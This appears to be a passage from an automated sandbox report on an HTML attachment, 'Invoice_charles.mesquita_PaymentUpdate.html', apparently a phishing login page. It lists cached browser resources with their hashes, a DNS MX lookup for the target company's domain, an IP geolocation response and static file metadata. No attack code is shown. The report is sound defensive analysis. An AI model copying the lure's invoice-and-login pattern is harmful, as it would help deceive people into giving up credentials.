                                                    Preview:@charset "UTF-8";/*! Local Version: 15.8.0 *//*! Release: 6.0.0.0 */:root{--svg-address:url("data:image/svg+xml, %3Csvg%20xmlns=%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20fill=%27%23000%27%20viewBox=%270%200%2026%2026%27%3E%3Cpath%20stroke=%27%23000%27%20stroke-width=%27.1%27%20d=%27M.95%2025.999v.066l.064-.018%207.59-2.181%207.373%202.055.013.003.013-.003%207.821-2.143.037-.01V12.083H23.11V23.23l-7.075%201.96-7.417-2.055-.013-.003-.014.003-6.888%201.957V8.515l6.902-1.96%204.983%201.383.047.013.014-.047.174-.589.014-.048-.048-.014-5.17-1.47-.014-.004-.014.004L.986%207.967l-.036.01V26Z%27%2F%3E%3Cpath%20stroke=%27%23000%27%20stroke-width=%27.1%27%20d=%27M16.388%2012.301v-.05H15.636v13.377H16.388V12.301ZM9.002%206.167v-.05H8.25v17.41H9.002V6.168Z%27%2F%3E%3Cpath%20stroke=%27%23000%27%20stroke-width=%27.1%27%20d=%27m19.69%2016.915.046.05.034-.059.214-.372c.024-.025.037-.05.047-.07v-.001a.171.171%200%200%201%20.035-.05c.131-.128.252-.266.371-.402.12-.137.239-.272.367-.396.523-.506%201.00

                                                    Chrome Cache Entry: 91

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (26254)
                                                    Category:downloaded
                                                    Size (bytes):26439
                                                    Entropy (8bit):5.4566708152893995
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:3EDCE381FC3DCC5CB83A9EB9518CF4B5
                                                    SHA1:7078776B85499968942E9415D9A512F468EA628E
                                                    SHA-256:8C2902F97FA93B60570005F4402CE83CD5C324A03B5D8D65B87DA5FD3A736F56
                                                    SHA-512:061F19F24B8C890296D233BECEF47623695B4613747863A7DEEF21C4E388538E086598F0BCD7CBCB3757C50F4FB684CAEBC8F985022A73DB327109DBC1195509
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://cdnjs.cloudflare.com/ajax/libs/jsrender/1.0.6/jsrender.min.js
                                                    Preview:/*! JsRender v1.0.6: http://jsviews.com/#jsrender */./*! **VERSION FOR WEB** (For NODE.JS see http://jsviews.com/download/jsrender-node.js) */.!function(t,e){var n=e.jQuery;"object"==typeof exports?module.exports=n?t(e,n):function(n){if(n&&!n.fn)throw"Provide jQuery or null";return t(e,n)}:"function"==typeof define&&define.amd?define(function(){return t(e)}):t(e,!1)}(function(t,e){"use strict";function n(t,e){return function(){var n,r=this,i=r.base;return r.base=t,n=e.apply(r,arguments),r.base=i,n}}function r(t,e){return st(e)&&(e=n(t?t._d?t:n(a,t):a,e),e._d=(t&&t._d||0)+1),e}function i(t,e){var n,i=e.props;for(n in i)!$t.test(n)||t[n]&&t[n].fix||(t[n]="convert"!==n?r(t.constructor.prototype[n],i[n]):i[n])}function o(t){return t}function a(){return""}function s(t){try{throw console.log("JsRender dbg breakpoint: "+t),"dbg breakpoint"}catch(e){}return this.base?this.baseApply(arguments):t}function l(t){this.name=(e.link?"JsViews":"JsRender")+" Error",this.message=t||this.name}function d(

                                                    Chrome Cache Entry: 92

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:ASCII text, with very long lines (30161)
                                                    Category:downloaded
                                                    Size (bytes):421081
                                                    Entropy (8bit):5.591382505638177
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:282349C0C608DA746DF39F39F029183F
                                                    SHA1:9EE19073469211781C4DAD3CE135CAD6C1832304
                                                    SHA-256:0C019D131D35724FDC19EB3EF6A7D414343C93725576D50B8B6E22743B9185C9
                                                    SHA-512:ECD3AF41C8F3B98BBF25384034FDEB4BC961E093F9FB455D25624A8F6F46A09EB5739271C84ECC15B2C170FACE88582A9D0755FB7E9D9508340F12DB39FB2520
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.googletagmanager.com/gtm.js?id=GTM-T2ZBL4Q
                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"77",. . "macros":[{"function":"__e"},{"function":"__k","vtp_decodeCookie":false,"vtp_name":"CookieControl"},{"function":"__jsm","vtp_javascript":["template","(function(){var a=",["escape",["macro",1],8,16],",b=\/.*\"targeting\":\"accepted\".*\/;return a=b.test(a)})();"]},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_name":"gtm.elementClasses","vtp_dataLayerVersion":1},{"function":"__remm","vtp_setDefaultValue":false,"vtp_input":["macro",3],"vtp_fullMatch":true,"vtp_replaceAfterMatch":

                                                    Chrome Cache Entry: 93

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):225
                                                    Entropy (8bit):4.988549602499535
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BC9FA4D40AE320A61C18FF06DCF6F1E5
                                                    SHA1:7FACE91B9D9C039C0C4DDECD412CC3569445B866
                                                    SHA-256:691C9F163F0F6F4BFF87B1E7197F86333D3687B3DDFD145CC371C9680ECBE704
                                                    SHA-512:116DA260F9623578E73E30A4A4DAC78CEA61381C946ED314E99E48CDDF5FC4202C634679AA65E8B8D9B4874F3C1C941E1DE429B85595C1BA08B87A976AB58AA5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:<svg width="25" height="25" viewBox="0 0 25 25" fill="none". xmlns="http://www.w3.org/2000/svg">. <circle cx="12.5" cy="12.5" r="12" stroke="#023843"/>. <path d="M8 13.5714L11.1765 16.25L17 8.75" stroke="#023843"/>.</svg>.

                                                    Chrome Cache Entry: 94

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):320
                                                    Entropy (8bit):4.928665435468996
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:27FD373FE536122A6CBC67C7E00C5865
                                                    SHA1:E60FEEE18E60724D2A4972112705D11EB2F76592
                                                    SHA-256:CA6F87EF6A21587F88B14F18F53971C1B6286F72902B0635EA5EE33CA6037701
                                                    SHA-512:A3CCDFB17F0BFDF6B51E4E8F1AF4AF8300D63C76763F7344E7489C8775B2EAB34CD202D0BA5337257E4C5F2E9709CF033D354C8E1449369DB48F9C29CD50B083
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"quiltercheviot.com.","type":15}],"Answer":[{"name":"quiltercheviot.com.","type":15,"TTL":300,"data":"10 mxb-0036ff01.gslb.pphosted.com."},{"name":"quiltercheviot.com.","type":15,"TTL":300,"data":"10 mxa-0036ff01.gslb.pphosted.com."}]}

                                                    Chrome Cache Entry: 95

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:Unicode text, UTF-8 text, with very long lines (34544)
                                                    Category:downloaded
                                                    Size (bytes):2534458
                                                    Entropy (8bit):5.2204058745013295
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:BC70276C7D0648454BC55A6EBEB78835
                                                    SHA1:762C274ECC28EEFF9E9B7A89C164C2905C7B27A3
                                                    SHA-256:CF3284A2E7015755920B1F9D490F80796942D524250FD3393757355EE370BE69
                                                    SHA-512:D3847C12A666979E8A114123DC7478C9B6B8F520D0A5E3D1ECAE5D2C6B33611B7FE626E9C21751473F7F182CED238C59084F932394DC42E605DB1649E3F3BA2D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    URL:https://www.quiltercheviot.com/scripts/global-v3.js?v=2.5.0.20037
                                                    Preview:(function(){function r(e,n,t){function o(i,f){if(!n[i]){if(!e[i]){var c="function"==typeof require&&require;if(!f&&c)return c(i,!0);if(u)return u(i,!0);var a=new Error("Cannot find module '"+i+"'");throw a.code="MODULE_NOT_FOUND",a}var p=n[i]={exports:{}};e[i][0].call(p.exports,function(r){var n=e[i][1][r];return o(n||r)},p,p.exports,r,e,n,t)}return n[i].exports}for(var u="function"==typeof require&&require,i=0;i<t.length;i++)o(t[i]);return o}return r})()({1:[function(require,module,exports){.(function webpackUniversalModuleDefinition(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports["accessibleAutocomplete"]=t():e["accessibleAutocomplete"]=t()})(window,function(){return function(n){var r={};function o(e){if(r[e])return r[e].exports;var t=r[e]={i:e,l:!1,exports:{}};return n[e].call(t.exports,t,t.exports,o),t.l=!0,t.exports}return o.m=n,o.c=r,o.d=function(e,t,n){o.o(e,t)||Object.d

                                                    Chrome Cache Entry: 96

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:JSON data
                                                    Category:dropped
                                                    Size (bytes):281
                                                    Entropy (8bit):5.112970080305849
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:DDE6425C80E0932E7850A7F8E8F74EBB
                                                    SHA1:0276923F3FBED46A523478E049471A3C99C80E68
                                                    SHA-256:1F5BD6A957C31847FB116EEA161BFE31647C66CCFC6D450814719B97F796368D
                                                    SHA-512:F24D9F25EFF2F13D4C928BBE35338621B4F784F1E0AD5E55ECD9013E509A59E7BF7173BFA84E6BD49F33314CD0F5CCF76372C15BB13AAEF751F51353AF3023CD
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:{. "ip": "161.77.13.20",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS7849 CROCKER COMMUNICATIONS, INCORPORATED",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}

                                                    Chrome Cache Entry: 99

                                                    Download File
                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                    File Type:SVG Scalable Vector Graphics image
                                                    Category:dropped
                                                    Size (bytes):922
                                                    Entropy (8bit):4.4550859949905135
                                                    Encrypted:false
                                                    SSDEEP:
                                                    MD5:FEEF2A0D452AC6FADB299412B2037D6D
                                                    SHA1:15A46E7B65405FC80977A6D34FBF175681647422
                                                    SHA-256:91C4EA1B0702F77B707417EA33B157FF4CBB62F651C51F6578273638FA7DBB69
                                                    SHA-512:680174627ADC98B74CDD4F5F7043B338A6407CCCFA40E342364B9C5478A832F969ADE10237CDF5F1429F4D16DF06C6B2EE491F8B2F98D9996B091564B31EDBCC
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview:<svg width="25" height="26" viewBox="0 0 25 26" fill="none". xmlns="http://www.w3.org/2000/svg">. <path fill-rule="evenodd" clip-rule="evenodd" d="M15.6106 16.3729L14.9998 16.631V17.2941V19.5H9.99976V17.2941V16.631L9.38895 16.3729C6.51413 15.1583 4.49976 12.3132 4.49976 9C4.49976 4.58172 8.08148 1 12.4998 1C16.918 1 20.4998 4.58172 20.4998 9C20.4998 12.3132 18.4854 15.1583 15.6106 16.3729ZM21.4998 9C21.4998 12.7292 19.2317 15.9286 15.9998 17.2941V19.5V20.5H14.9998H9.99976H8.99976V19.5V17.2941C5.76781 15.9286 3.49976 12.7292 3.49976 9C3.49976 4.02944 7.52919 0 12.4998 0C17.4703 0 21.4998 4.02944 21.4998 9ZM12.9998 3.5C13.6555 3.5 14.7863 3.97651 15.7726 4.95497C16.7387 5.91332 17.4998 7.29127 17.4998 9H18.4998C18.4998 6.9754 17.5941 5.35335 16.4769 4.24503C15.3799 3.15682 14.0106 2.5 12.9998 2.5V3.5ZM14.7976 25.0035H10.2V24.0035H14.7976V25.0035ZM8.99976 23H15.9998V22H8.99976V23Z" fill="#023843"/>.</svg>.

                                                    Static File Info

                                                    General

                                                    File type:HTML document, ASCII text, with very long lines (15237), with CRLF line terminators
                                                    Entropy (8bit):6.009435221121203
                                                    TrID:
                                                    • HyperText Markup Language (15015/1) 20.56%
                                                    • HyperText Markup Language (12001/1) 16.44%
                                                    • HyperText Markup Language (12001/1) 16.44%
                                                    • HyperText Markup Language (11501/1) 15.75%
                                                    • HyperText Markup Language (11501/1) 15.75%
                                                    File name:Invoice_charles.mesquita_PaymentUpdate.html
                                                    File size:17'483 bytes
                                                    MD5:dc90cca6cc296a6750140d5ada2ae0a4
                                                    SHA1:ed093e3d9dfb92d7f1c481b17655ed8eb9aa0bdc
                                                    SHA256:18510c0f3b951e1f348a99ef04725cb19162508a762ae3340e0ef8d251819011
                                                    SHA512:a5a8c508626a037daa0ae1ab6857b03aa5c3d00bc37a11ca481acdb5edb101cbfbb4b230abde7d19c0e95cdc536e4dcd85f8298a53e0eeb60cf5ad83fff2cc7a
                                                    SSDEEP:384:L+KJRwgIPj0p+txC/lR4po3ZSUt7X4H6cfIjILP6pWfxGILuoxxxHx6gn:wFjYggjppWfxG4jd5n
                                                    TLSH:A272E8A87F9235F873B507DF1B355541DA00CE8EE2864148BD3C25897F74B0AAC63B69
                                                    File Content Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Login</title>.. <style>.. body {.. margin: 0;.. padding: 0;..

                                                    File Icon

                                                    Icon Hash:1270ce868a8686b8